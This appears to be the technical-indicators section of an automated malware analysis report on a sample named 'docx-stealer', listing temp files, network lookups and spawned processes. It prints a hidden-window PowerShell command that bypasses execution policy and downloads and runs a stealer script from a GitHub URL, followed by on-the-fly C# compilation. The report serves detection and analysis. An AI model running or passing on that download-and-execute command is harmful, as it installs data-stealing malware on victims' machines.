Technical Information
- https://raw.githubusercontent.com/niro095/docx-stealer/master/dxs.ps1
- %TEMP%\sqvh2ibf.0.cs
- %TEMP%\sqvh2ibf.cmdline
- %TEMP%\sqvh2ibf.out
- %TEMP%\csc546b.tmp
- %TEMP%\res547c.tmp
- %TEMP%\sqvh2ibf.dll
- %TEMP%\res547c.tmp
- %TEMP%\csc546b.tmp
- %TEMP%\sqvh2ibf.dll
- %TEMP%\sqvh2ibf.pdb
- %TEMP%\sqvh2ibf.0.cs
- %TEMP%\sqvh2ibf.out
- %TEMP%\sqvh2ibf.cmdline
- 'ra#.####ubusercontent.com':443
- DNS ASK ra#.####ubusercontent.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ep bypass -C "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/niro095/DocX-Stealer/master/DxS.ps1')' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\sqvh2ibf.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES547C.tmp" "%TEMP%\CSC546B.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\sqvh2ibf.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES547C.tmp" "%TEMP%\CSC546B.tmp"